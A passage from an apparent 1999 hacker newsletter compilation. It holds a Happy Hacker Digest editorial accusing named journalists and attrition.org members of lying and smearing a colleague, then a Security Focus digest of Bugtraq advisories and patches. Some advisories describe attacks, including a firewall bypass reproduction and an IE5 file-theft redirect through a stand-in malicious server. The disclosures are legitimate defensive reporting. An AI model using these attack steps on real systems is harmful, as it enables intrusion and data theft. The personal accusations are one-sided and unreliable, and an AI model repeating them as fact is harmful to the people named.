Glass -- would risk losing his career by going along with Martin's scheme to smear Vranesevich. Could it possibly have something to do with the book Penenberg told me he is writing about hackers? Could he and the other two reporters who have written stories invented by Martin possibly be vying to get exclusive rights to the story of the hacking spree of Hacking for Girliez/Loan Gunmen? Nah, I'm probably just paranoid. Well, it's time to sign off and get back to playing with SuSE Linux. I'm building a new Hacker Wargame box with SuSE, lady.happyhacker.org. Meanwhile, Vranesevich is working on raising funding to pay someone to administer the Hacker Wargame full time so we can teach you serious computer security techniques in a fun environment. I feel honored to know Vranesevich, and look forward to the day when the people running the smear campaign against him suffer the fate of Stephen Glass. Oh, in case you were wondering, Glass has been studying to be a lawyer. *** The Stephen Glass Syndrome See http://www.forbes. com/columnists/penenberg/1999/0927.htm for the phony story against John Vranesevich that Penenberg recently wrote. If you are a reporter, call me at 505-281-9675 and I'll give you contact information for witnesses who can demonstrate that almost every item in Penenberg's story is false. Specifically, Penenberg recycles every unfounded allegation made against Vranesevich that any reporter has ever been unethical enough to pick up from Martin's web site. In private conversations with me, however, Penenberg has admitted he knows Martin has no credibility. Penenberg was elevated to a senior editor of Forbes on the basis of his article "Lies, damn lies and fiction" in Forbes Digital Tool (May 11, 1998). This broke the story behind "Hacker Heaven," an article in the New Republic by Stephen Glass. Unfortunately the Forbes web site no longer carries Penenberg's article. However, the Columbia Journalism Review has an excellent story on the Glass hacker hoax at http://www.cjr.org/year/98/4/glass.asp. Following is an excerpt: How a Writer Fooled His Readers by Ann Reilly Dowd Dowd, a free-lancer, is former Washington bureau chief of Money and Fortune "We're going to Bethesda," Charles Lane, the editor of The New Republic, told Stephen Glass, the writer of a May 18 story, "Hack Heaven," that was being called factually challenged by reporters over at Forbes Digital Tool, the Forbes magazine Web site. And in Bethesda, Maryland, at the building where Glass had supposedly covered a computer-hackers' convention, Lane says his twenty-five-year-old star gave "the most detailed step-by-step account" of where he had sat, and with whom he had spoken. It was only when Lane reminded him that the building's log and security videos would show who was actually there that day that Glass broke down and sobbed. Yes, he confessed, he had made up the conference. In truth, Lane says, the entire article had been created "out of whole cloth." So, it turns out, were others. Stephen Glass was a bright, prolific writer and prodigious reporter. He had a likable demeanor, an eye for detail, and an ear for language. He also had a fatal flaw -- a stunning lack of integrity... How was it possible that editors and checkers, who make their living as professional skeptics, got so snookered? When did it begin, and why?. Glass gamed the system, and brilliantly. He'd often submit stories late to the checkers so they were pressed for time. When they questioned his material, Lane says, Glass would provide forged faxes on fake letterheads of phony organizations, as well as fictitious notes, even voice mail or actual calls from people pretending to be sources. *** Where the heck have we been? _______________________________________________________________________ Yes, we're still alive! Sorry for the long time not sending out mailings. If you visit our web site from time to time, you'll see new features. Actually, there's plenty of new material there. Check it out! Also, we've had severe problems for almost two months with a bad T1 in our Amarillo operations. So when you saw supposedly broken pictures or got a "connection reset by peer" message, that was just one after another technical screwup on the part of the backbone (Sprint, if you really want to know). We are coping with that situation by mirroring the Happy Hacker web site on both the Antionline servers in Beaver, PA, while keeping another server up at SAGE, Inc.'s Amarillo site. The SAGE server we are using is the recently released commercial version of their BRICKHouse server. It's name is http://gabriel.happyhacker.org, 206.61.52.31. Try to break into her -- please! That's what beta testing is all about! The other is, um, well, I'm not supposed to tell (oh, no, security by obscurity!). But, hey, typing http://happyhacker.org or http://www.happyhacker.org will get you there unless you run into a DNS server that doesn't update too often. I (Carolyn Meinel) have also been busy working on our Hacker Wargame. People who were persistent discovered three new computers on the Wargame in August and September. No one got root, but I did preserve all files on meyer.happyhacker.org, an OpenBSD server. When I put it back up (probably next week), the folks who figured out the ridiculous guest password and the few who got into guest2 using find and grep can get back into the game and play with those two "find" executables. Someone forgot to compile in the "bash hide" option on one of them, tsk, tsk. In general, the concept of the wargame is to figure out what is happening there yourself. If you have to ask me what computers are there and how to break in, you aren't ready yet to play the game. The basic concept is to look for computers whose IP addresses resolve to something that ends with "happyahcker.org." See the Happy Hacker bookstore (http://happyhacker.org/bookstore.html) for computer manuals that will help get you up to speed, and read our Guides and Digests. Oh, yes, don't forget The Happy Hacker book. Don't email me with questions! Please! I have reached email meltdown and mostly just delete everything nowadays. Also, people who email me asking for help committing crime will discover that they are being immortalized at http://happyhacker.org/sucks.html. I've also been working on a shell account server, http://shells.techbroker.com. I had it on the Wargame for almost two months with two easy to crack accounts (one was user name test, password test). The Tg0d gang got inside and was messing around and not getting root. That made me feel good about the security, which was created by Satori and B-lips. When it goes back up online in a few days, check it out for instructions on how to set up a home Windows 95/98 LAN and set up an Internet gateway so all your computers can access the Internet simultaneously through just one modem. We will be selling shell accounts on shells.techbroker.com with tech support for people who want the power of a T1 for learning how to hack, and as a platform for competing in our Hacker Wargame. Of course we will not allow shells.techbroker.com to be used as a platform to commit crime. Each Tuesday http://antionline.com posts a new "tip of the week" of mine. If you want to find out how to get online with Linux really easily, even easier than Windows, check out the tip archives. In a nutshell, the answer is, make sure your modem isn't a Winmodem, and install Caldera Linux (http://www.caldera.com). You can get an outstanding book on how to use Caldera at the Happy Hacker bookstore, http://happyhacker.org/bookstore.html. Also, I've been working on my next book, "Uberhacker: How to Break into Computers." It will tell how to create Linux and WinNT attack computers, how to set up OpenBSD and Linux bastion computers, and how to set up a home hacker laboratory with many operating systems cheaply! As usual, I have to test everything. This keeps me rather busy. Not only that, in order to be helpful to you who will read the book, I try everything on many different computers with many different operating systems, and do half a dozen installations of each operating system on several different hardware configurations. Whew! I've finished working with Red Hat Linux. Right now I am experimenting with SuSE Linux (http://www.suse.de), which comes with a totally awesome 5 gigs worth of programs, including many of great interest to hackers, such as nmap and SAINT. I'm also still playing with Caldera, which is easier to install than Windows 98. Next on my list are Debian Linux (http://www.debian.org) and Solaris (http://www.sun.com). *** Call for Editors We lost our Windows Digest editor Keydet89 because he objected to John Vranesevich donating his listserv services to us. Keydet89 had several angry conversations with me in which he made it clear that he believes the allegations made against Vranesevich by Brian Martin's hacker gang, as seen at http://attrition.org. Our Unix editor also quit. As you saw in his last Digest, he was angry at Vranesevich for pointing out to Harvard University that the Packetstorm web site they were hosting contained a photo of his kid sister, her home address, and incitements to harm her. Yes, I saw that material myself. Harvard immediately took down the site, and made a statement to the media that the reason was attacks on an individual and pornography. Please give the Harvard administration credit for being decent human beings, folks. And. I have no desire to work with anyone who would hate Vranesevich for protecting his kid sister. I apologize to you who have subscribed to this mail list for not having done a better job of evaluating the character of two of the people who were our editors. I was looking foremost for technical talent. I failed to adequately consider the issue of values. If anyone would like to take over the jobs of Windows editor and Unix editor, please phone me at 505-281-9675. (Sorry, with there being way too much email, I usually just delete it unless it is from someone I know.) This time around I will make sure that anyone who does volunteer work for us agrees that the attrition.org web site has serious ethical problems. I mean, get real. Attrition.org carries instructions for how to shoplift without getting caught and advocates murder, burglary, perjury and computer crime. Common sense alone should tell anyone that its proprietors must also lie like rugs. If you applied before, please consider doing so again. I apologize in advance for not choosing you, OK? These jobs pay nothing except the sense of satisfaction of helping people to learn about computers. OK, the job also gives you something to put on your resume and gives you visibility in the computer security industry. Also you can get into the inner circle of Happy Hacker and hang out with us terminal geeks. Wowie! If you take the job, you will have to put up with people from Brian Martin's Attrition.org emailing and phoning you with fanciful, malicious stories. If you do a good enough job, it is also possible that computer criminals will persuade their stable of credulous or unethical reporters (Polly Sprenger of Wired, Lew Koch of Cyberwire Dispatch, and Adam Penenberg of Forbes) into writing false and malicious stories about you, just as they have about Vranesevich. So, if you are an ambitious masochist -- is this the perfect job, or what? _______________________________________________________________________ To subscribe to the Happy Hacker Digest, email mailman@mailout.antionline.net with the message "subscribe happyhacker." Unsubscribe with message unsubscribe happyhacker. This is a list devoted to *legal* hacking! If anyone plans to use any information in this Digest or at our Web site to commit crime, go away! We like to put computer criminals behind bars where they belong! Hacker Wargame Director, Vincent Larsen ; Clown Princess: Carolyn Meinel Happy Hacker, Inc. is a 501 (c) (3) tax deductible organization _______________________________________________________________________ @HWA 93.0 Security Focus Newsletter ~~~~~~~~~~~~~~~~~~~~~~~~~ Security Focus Newsletter 10 & 11 Table of Contents: I. INTRODUCTION II. BUGTRAQ SUMMARY 1. Hybrid Cablemodem Remote Configuration Vulnerability 2. Microsoft IE5 IFRAME Vulnerability 3. RedHat PAM NIS Locked Accounts Vulnerability 4. WebTrends Enterprise Reporting Server Multiple Vulnerabilities 5. Jana Webserver Vulnerability 6. Novell Client Denial of Service Vulnerability 7. SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability 8. SCO cancel Buffer Overflow Vulnerability 9. RedHat lpr/lpd Vulnerabilities 10. OpenLink 3.2 Remote Buffer Overflow Vulnerability 11. Gauntlet Firewall Rules Bypass Vulnerability 12. Microsoft IE5 Javascript URL Redirection Vulnerability III. PATCH UPDATES 1. Vulnerability Patched: rpmmail Remote Command Execution Vulnerability 2. Vulnerability Patched: Microsoft JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities\ 3. Vulnerability Patched: Microsoft IE5 Download Behavior Vulnerability 4. Vulnerability Patched: Novell Client Denial of Service Vulnerability 5. Vulnerability Patched: IIS Writeable mailroot/ftproot DoS Vulnerability 6. Vulnerability Patched: Referer Tag Vulnerability (Roxen Webserver) 7. Vulnerability Patched: RedHat PAM NIS Locked Accounts Vulnerability 8. Vulnerability Patched: Microsoft IE5 IFRAME Vulnerability 9. Vulnerability Patched: RedHat lpr/lpd Vulnerabilities 10. Vulnerability Patched: Microsoft IE5 Javascript URL Redirection Vulnerability 11. Vulnerability Patched: Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability 12. Vulnerability Patched: Multiple Vendor amd Buffer Overflow Vulnerability 13. Vulnerability Patched: Linux mirror Vulnerability (Debian) 14. Vulnerability Patched: Multiple Linux Vendor lpr/lpd Vulnerabilities 15. Vulnerability Patched: Mulitple Linux Vendor PAM NIS Locked Accounts Vulnerability IV. INCIDENTS SUMMARY 1. Interesting scans in the past few days (Thread) 2. Random malfunction or hack? 3. Notifying possibly compromised sites & SANS 99 (Thread) 4. Site for sharing TCPDumps, firewall logs, etc.? (Thread) 5. Log sharing 6. Attack methodology 7. Slow scan of 80,8080,3128/tcp from multiple sources (Thread) 8. RES: Anyone seen traffic headed for UDP port 31789? (Thread) 9. Intrusion Detection rfc draft 10. directed broadasts to UDP ports 41508, 41524, 41530 V. VULN-DEV RESEARCH LIST SUMMARY 1. Re: Guestbook perl script (error fix - Thread) 2. The PcWeek crack 3. Re: Cisco IOS password types overview. (Thread) 4. Timbuktu32 (Thread) 5. Re: solaris DoS (fwd) 6. FW: puzzlecrypt(tm--dr) (hint:sploit against dr - so I don't go deaf) 7. Newbie in Jeopardy 8. Window manager - implementation bug/feature ??? (Thread) 9. fbsd 3.3 ospf_monitor research (Thread) 10. SSH and X11 forwarding 11. NT SysKey should be breakable (Thread) 12. 2 dodgy network programs 13. Free BSD 2.2.x listen() problem / FTP exploit 14. Classes? (Thread) 15. possible gnome remote overflow VI. SECURITY JOBS Discussion: 1. yet another question about entering the security field (Thread) Seeking Position: 1. Contact: I am looking for a good company to work for NYC - Edward Saxon, 2. Contact: Looking for security system administration position - Ender Wiggin, Mike@aviary-mag.com Seeking Staff: 1. Unix/Network/Security Engineer - NYC 2. Developer needed - San Mateo - California 3. Unix/Network Security Engineer Needed In Maryland 4. Domain Expert / Security Development / IT / Logistics #123 5. Security Verification Analyst #123 6. looking for information security manager.... 7. Job opportunities in San Jose 8. 3com Job Posting 1. Perl Programmer/System Administrator - NYC 2. Wirex: Linux Systems Administrator, Portland, Oregon 3. 10+ positions in the Bay Area, LA 4. Security Engineers in Waltham, MA VII. SECURITY SURVEY RESULTS VIII. SECURITY FOCUS EVENTS 1. New Scoring and Comments under Tools, Products, Library and Links 2. New Guest Feature - THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2 IX. SECURITY FOCUS TOP 6 TOOLS 1. UCGI Vulnerability Scanner 1.56 (Windows & Unix) 2. NTInfoScan (NT) 3. SuperScan 2.0.4 (NT) 4. PacketX (NT) 5. Achtung (NT) 6. Custom Attack Scripting Language (NT & Unix) X. SPONSOR INFORMATION - Tripwire Security I. INTRODUCTION ----------------- Welcome to the Security Focus 'week in review' newsletter issue 10 & 11. We apologize for combining two weeks in a row. We have been working furiously on building infrastructure here at Security Focus. One of the results of this is that now you can rate and comment on essentially every item, product, paper and vendor on our site. Hopefully this new rating system will, over time, create an excellent community resource. II. BUGTRAQ SUMMARY 1999-10-04 to 1999-10-19 --------------------------------------------- 1. Hybrid Cablemodem Remote Configuration Vulnerability BugTraq ID: 695 Remote: Yes Date Published: 1999-10-05 Relevant URL: http://www.securityfocus.com/bid/695 Summary: Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem. 2. Microsoft IE5 IFRAME Vulnerability BugTraq ID: 696 Remote: Yes Date Published: 1999-10-11 Relevant URL: http://www.securityfocus.com/bid/696 Summary: Internet Explorer 5 will allow a malicious web page to read the contents of local files through a weakness in the IE5 security model. Normally the document.execCommand method is restricted from reading and returning data on the local machine, however if the method is called from within an IFRAME this restriction can be circumvented. 3. RedHat PAM NIS Locked Accounts Vulnerability BugTraq ID: 697 Remote: No Date Published: 1999-10-13 Relevant URL: http://www.securityfocus.com/bid/697 Summary: Under some network configurations it may be possible to access locked NIS accounts due to a vulnerability in the PAM authentication modules shipped with RedHat version 6.1. This can lead to a local compromise where the password is known for a locked account. RedHat 6.1 for Intel platforms is the only vulnerable version. 4. WebTrends Enterprise Reporting Server Multiple Vulnerabilities BugTraq ID: 698 Remote: Yes Date Published: 1999-10-09 Relevant URL: http://www.securityfocus.com/bid/698 Summary: Certain versions of the WebTrends Enterprise Reporting Server contain a series of vulnerabilities. Namely versions 1.5 and previous, the vulnerabilities in question are be: 1. Logging via the server will write to a world/writable file. Under certain conditions this file may contain certain sensitive information such as usernames and passwords, in clear text. This in particular is known to occur if you are not running using PAM (Pluggable Authentication Module). If the server is running without PAM, users must use the server provided interface to create new users and set their passwords. In this case, by default, everything (including username and password) is stored in clear text in the file "interface.log" with read/write permissions for user, group and other. Any local user can read that file. If a WebTrends user has also an shell account on the box with the same password, that account can be compromised. 2. The server stores its' user information in files with world read/write permissions. All user information is stored in the directory "wtm_wtx/datfiles/users" in the format "username.usr". Those files are with owner/group/other read/write permissions. Any local user, can decrypt the password or even easier alter/delete the user file and therefore create a denial of service. 3. User profiles are stored in world readable, writable files. By altering these files it may be possible to launch a denial of service attack. As with the user files all profile information is stored in "wtm_wtx/datfiles/profiles" with owner/group/other read/write permissions. Any local user can alter/delete the profile file and therefore create a denial of service. 4. Under default installations, a blank username and password is enabled. This will allow remote users to access the server with administration privileges to the software if the owner neglects to change this. 5. Jana Webserver Vulnerability BugTraq ID: 699 Remote: Yes Date Published: 1999-10-08 Relevant URL: http://www.securityfocus.com/bid/699 Summary: The Jana webserver is remotely vulnerable to an attack which can allow hackers to view files outside of the root httpd directory. See the bugtraq posting linked to from the references section of this vdb entry for more information. We have not been able to locate the maintainer of this product (The Jana webserver). If anyone has any information about who to contact for information regarding this issue, please contact vuldb@securityfocus.com. 6. Novell Client Denial of Service Vulnerability BugTraq ID: 700 Remote: Yes Date Published: 1999-10-08 Relevant URL: http://www.securityfocus.com/bid/700 Summary: Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable to a remotely exploitable vulnerability which could cause a denial of service. The client opens a listening tcp socket on port 427, to which if a SYN is sent, results in the machine locking with a "blue screen" error. The only solution from that point is to reset the affected computer. 7. SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability BugTraq ID: 701 Remote: No Date Published: 1999-10-11 Relevant URL: http://www.securityfocus.com/bid/701 Summary: Under certain versions of SCO OpenServer there exists a symlink vulnerability which can be exploited to overwrite any file which is group writable by the 'auth' group. The problem in particular is in the the /etc/sysadm.d/bin/userOsa executable. When given garbage output the program will write out a debug log. However, the program does not check to see if it overwriting a currently existing file nor wether it is following a symlink. Therefore is it possible to overwrite files with debug data which are both in the 'auth' group and are writable by the same group. Both /etc/shadow & /etc/passwd fall into this category. If such an attack were launched against these files the system would be rendered unusable. 8. SCO cancel Buffer Overflow Vulnerability BugTraq ID: 702 Remote: No Date Published: 1999-10-08 Relevant URL: http://www.securityfocus.com/bid/702 Summary: There is a buffer overflow vulnerability in /opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel. It is important to know that the overflows are not in "/usr/bin/cancel" or "/usr/lpd/remote/cancel". The consequence of this vulnerability being exploited is compromise of effective groupid of group lp. 9. RedHat lpr/lpd Vulnerabilities BugTraq ID: 718 Remote: No Date Published: 1999-10-18 Relevant URL: http://www.securityfocus.com/bid/718 Summary: The lpr packages that ship with RedHat Linux releases 4.x to 6.1 contain vulnerabilities which may allow printing of files for which read access is not allowed. The first of the two problems is a race condition that can be exploited between the access checking and the opening of the file. The second is a symlink attack that could also be used to print files that normally cannot be read by a regular user (through lpr -s). 10. OpenLink 3.2 Remote Buffer Overflow Vulnerability BugTraq ID: 720 Remote: Yes Date Published: 1999-10-15 Relevant URL: http://www.securityfocus.com/bid/720 Summary: Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable to a remotely exploitable buffer overflow attack. The problem is in their web configuration utility, and is the result of an unchecked strcpy() call. The consequence is the execution of arbitrary code on the target host (running the configuration utility) with the priviliges of the web software. 11. Gauntlet Firewall Rules Bypass Vulnerability BugTraq ID: 721 Remote: Yes Date Published: 1999-10-18 Relevant URL: http://www.securityfocus.com/bid/721 Summary: It may be possible to violate all firewall rules if certain conditions are met when Gauntlet Firewall 5.0 is installed on the BSDI platform with a specific configuration. The following things need to happen in the order listed below for Gauntlet to be exploitable: 1) Install BSDI 3.1 2) Install Gauntlet 5.0 3) Install BSDI patch M310-049 4) Install Gauntlet 5.0 kernel patch level 2 5) Remove any proxy settings on client machine. 6) Set the default route on the client machine and attempt to connect to any host through a normal tcp connection. This problem surfaces when connections are made through any adaptive proxy, "old" proxy or no proxy at all. In order to exploit this, a route will need to be specified since NAT will not occur when data is sent through the affected firewall. None of the connections that ignore the rules are logged in /var/log/messages. Keith Young describes how to replicate the problem (this is taken directly from his bugtraq post): 1) Install BSDI 3.1, March 1998. Use automatic install, however you may install minimal packages if you wish. 2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall 3) Install Gauntlet 5.0. 4) Reboot after installation. 5) Login as root. 6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for external and internal interfaces. If necessary, configure ESPM hosts, DNS settings, and admin users. 7) Quit gauntlet-admin, save changes, and rebuild. 8) After proxies have reconfigured, reboot machine. 9) Since M310-049 is required for Gauntlet kernel patch install, and M310-046 is required for M310-049 installation, download both from ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/ File info: M310-046 1194 Kb Wed Oct 14 00:00:00 1998 M310-049 116 Kb Wed Dec 16 00:00:00 1998 Both patches are considered "OK" by the Gauntlet support site: http://www.tis.com/support/bsd31.html 10) Bring machine to single-user mode by executing "kill -term 1". 11) Execute "perl5 M310-046 apply" to install BSDI libc patch. 12) Execute "perl5 M310-049 apply" to install IP DoS fix. 13) Execute "cd /sys/compile/GAUNTLET-V50/". 14) Build new kernel as required by M310-049 IP DoS kernel fix. # make clean # make depend # make 15) After kernel is rebuilt, reboot machine. 16) Download Gauntlet 5.0 kernel and cluster patch: File info: cluster.BSDI.patch 12623 Kb Wed Sep 01 19:33:00 1999 kernel.BSDI.patch 414 Kb Wed Aug 04 17:54:00 1999 17) As noted in patch install directions, execute the following: # sh ./cluster.BSDI.patch # sh ./kernel.BSDI.patch # cd kernel.BSDI.patch # sh ./apply # cd ../cluster.BSDI.patch # sh ./apply 18) After patches are installed, reboot machine. 19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client machine to trusted network group. Apply changes. 20) Start web browser on client machine. Set web proxy setting to internal interface of firewall. Attempt to connect to external web server. Access is allowed. *This is correct.* 20) Remove http-gw from trusted network services. Apply changes. Attempt to connect to external web server. Access is denied. *This is correct.* ==Problem starts here== 21) Remove proxy setting in web browser on client machine. Set gateway/default route on client machine to internal interface of firewall. Set gateway/default route on server machine to external interface of firewall. 22) Clear web browser cache. Attempt to connect to external web server. Web page is downloaded with no logs in Gauntlet. 23) Start ESPM-GUI. Remove all services from trusted networks services. Remove client machine from ESPM network group. Apply changes. 24) FTP from client machine to server. FTP connection is made though no rule exists. 25) Start telnet server on client machine. Telnet from server to client. Telnet connection is made. 12. Microsoft IE5 Javascript URL Redirection Vulnerability BugTraq ID: 722 Remote: Yes Date Published: 1999-10-18 Relevant URL: http://www.securityfocus.com/bid/722 Summary: A malicious web site operator could design a web page that, when visited by an IE5 user, would read a local file from the victim host (or any file on the victim's network to which the victim has access) and send the contents of that file to a designated remote location. 1) In the instance noted above, the IE5 user visits a malicious web site. 2) The web site instructs the client to open another IE5 browser window and display the contents of a file residing on the IE5 user's host (or another host on the network to which the IE5 user has access). 3) Immediately after opening the new browser window, the window is instructed to browse to a specified web site ie: http://malicious server.com/hack.cgi?doit. 4) The hack.cgi?doit page does not return a web page, but instead redirects the window to a javascript URL containing embedded executable code. 5) The javascript code (from step 4) can now access any files on the victim's host (or any file on the victim's network to which the victim has access) and send it to a location maintained by the malicious web site operator. Under normal circumstances, javascript received from a non-local "security zone" is not allowed to perform such actions against files on the local host. In this instance, however, the IE5 browser has been fooled (via http redirect to javascript) into thinking that the Javascript should execute under the security context of the local host's security zone as the javascript was requested from a browser displaying the local file. Microsoft has released a FAQ that contains a good description of this vulnerability: http://www.microsoft.com/security/bulletins/MS99-043faq.asp. III. PATCH UPDATES 1999-10-04 to 1999-10-19 ------------------------------------------- 1. Vendor: Reedycreek Product: rpmmail Patch Location: ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4.tar.gz ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4-2.i386.rpm Vulnerability Patched: rpmmail Remote Command Execution Vulnerability BugTraq ID: Relevant URLS: http://www.reedycreek.com 2. Vendor: Microsoft Product: Microsoft JET 4.0SP1 Vulnerability Patched: Microsoft JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities BugTraq ID: 654 Patch Location: http://officeupdate.microsoft.com/articles/mdac_typ.htm Relevant URLS: http://www.securityfocus.com/bid/654/ 3. Vendor: Microsoft Product: Internet Explorer 5.0 Vulnerability Patched: Microsoft IE5 Download Behavior Vulnerability BugTraq ID: 674 Patch Location: http://www.microsoft.com/msdownload/iebuild/dlbhav/en/dlbhav.htm http://windowsupdate.microsoft.com Relevant URLS: http://www.securityfocus.com/bid/674 4. Vendor: Novell Product: Novell Client 3.1 for Windows Vulnerability Patched: Novell Client Denial of Service Vulnerability BugTraq ID: 700 Patch Location: http://support.novell.com/cgi-bin/search/tidfinder.cgi?2945422 Relevant URLS: http://www.securityfocus.com/bid/700 http://support.novell.com 5. Vendor: Microsoft Product: IIS Vulnerability Patched: IIS Writeable mailroot/ftproot DoS Vulnerability BugTraq ID: Patch Location: A tip was added to the Microsoft Security Checklist regarding this problem. http://www.microsoft.com/security/products/iis/CheckList.asp Relevant URLS: http://www.microsoft.com/security 6. Vendor: Roxen Product: Challenger Webserver Vulnerability Patched: Referer Tag Vulnerability BugTraq ID: Patch Location: ftp://ftp.roxen.com/pub/roxen/patches/roxen_1.3.111-htmlparse.pike.patch Relevant URLS: http://www.roxen.com 7. Vendor: Red Hat Product: RedHat Linux Vulnerability Patched: RedHat PAM NIS Locked Accounts Vulnerability BugTraq ID: 697 Patch Location: RedHat released new PAM packages available at: ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm Relevant URLS: http://www.redhat.com/corp/support/errata/index.html http://www.securityfocus.com/bid/697 8. Vendor: Microsoft Product: Microsoft Internet Explorer Vulnerability Patched: Microsoft IE5 IFRAME Vulnerability BugTraq ID: 696 Patch Location: http://www.microsoft.com/windows/ie/download/windows.htm MSIE Only (Intel): ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe MSIE Only (Alpha): ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe Relevant URLS: http://security.microsoft.com http://www.securityfocus.com/bid/696 9. Vendor: Red Hat Product: RedHat Linux Vulnerability Patched: RedHat lpr/lpd Vulnerabilities BugTraq ID: 718 Patch Location: Red Hat Linux 4.x: Intel: ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm Alpha: ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm Sparc: ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm Source packages: ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm Red Hat Linux 5.x: Intel: ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm Alpha: ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm Sparc: ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm Source packages: ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm Red Hat Linux 6.x: Intel: ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm Alpha: ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm Sparc: ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm Source packages: ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm Relevant URLS: http://www.redhat.com/corp/support/errata/index.html http://www.securityfocus.com/bid/718 10. Vendor: Microsoft Product: Microsoft Internet Explorer Vulnerability Patched: Microsoft IE5 Javascript URL Redirection Vulnerability BugTraq ID: 722 Patch Location: Workaround detailed in advisory located at: http://www.microsoft.com/security/bulletins/MS99-043faq.asp Full patch not released yet. Relevant URLS: http://security.microsoft.com http://www.securityfocus.com/bid/722 11. Vendor: Compaq Product: Tru64 Unix Vulnerability Patched: Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability BugTraq ID: 635 Special Note: This vulnerability affected products from multiple vendors, this patch is only for True64/Compaq products. Patch Location: http://www.service.digital.com/patches Patch file name: SSRT0615U_dtaction.tar Use the FTP access option, select DIGITAL_UNIX directory then choose the appropriate version directory and download the patch accordingly. Relevant URLS: http://ftp.service.digital.com/public/osf/v4.0d/ssrt0615u_dtaction.README http://www.securityfocus.com/bid/635 12. Vendor: Debian Product: Debian GNU/Linux Vulnerability Patched: Multiple Vendor amd Buffer Overflow Vulnerability BugTraq ID: 614 Special Note: This vulnerability affected products from multiple vendors, this patch is only for Debian products. Patch Location: http://security.debian.org/dists/stable/updates/source/amd_upl102.orig.tar.gz Relevant URLS: http://www.debian.org/security http://www.securityfocus.com/bid/614 13. Vendor: Debian Product: GNU/Linux Vulnerability Patched: Linux mirror Vulnerability BugTraq ID: Patch Location: http://security.debian.org/dists/stable/updates/source/mirror_2.9.orig.tar.gz Relevant URLS: http://www.debian.org/security 14. Vendor: Mandrake Product: Linux-Mandrake Vulnerability Patched: Multiple Linux Vendor lpr/lpd Vulnerabilities BugTraq ID: 718 Patch Location: ftp://csociety-ftp.ecn.purdue.edu/pub/mandrake/updates/6.1/SRPMS/lpr-0.43-1mdk.src.rpm Relevant URLS: http://www.securityfocus.com/bid/718 15. Vendor: LinuxPPC Product: LinuxPPC Vulnerability Patched: Mulitple Linux Vendor PAM NIS Locked Accounts Vulnerability BugTraq ID: 697 Patch Location: ftp://ftp.linuxppc.org/linuxppc-1999/security/RPMS/pam-0.68-8.ppc.rpm Relevant URLS: http://www.linuxppc.com/security/1999/10/12.shtml http://www.securityfocus.com/bid/697 INCIDENTS SUMMARY 1999-10-04 to 1999-10-19 ------------------------------------------ 1. Interesting scans in the past few days (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-09-29&msg=LOBIJPKEFBHDAAAA@mailcity.com 1. Re: Interesting scans in the past few days (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-01&msg=19991006055120.25151.qmail@securityfocus.com 2. Random malfunction or hack? Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-01&msg=4.2.0.58.19991007104131.041af600@localhost 3. Notifying possibly compromised sites & SANS 99 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991010030053.2954.qmail@securityfocus.com 4. Site for sharing TCPDumps, firewall logs, etc.? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991010030259.3005.qmail@securityfocus.com 5. Log sharing Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=3.0.3.32.19991012151149.0180dc90@192.133.124.9 6. Attack methodology Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991012230738.14149.qmail@securityfocus.com 7. Slow scan of 80,8080,3128/tcp from multiple sources (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=991013161041HK.24502@weba2.iname.net 8. RES: Anyone seen traffic headed for UDP port 31789? (Thread) Relevant URL: 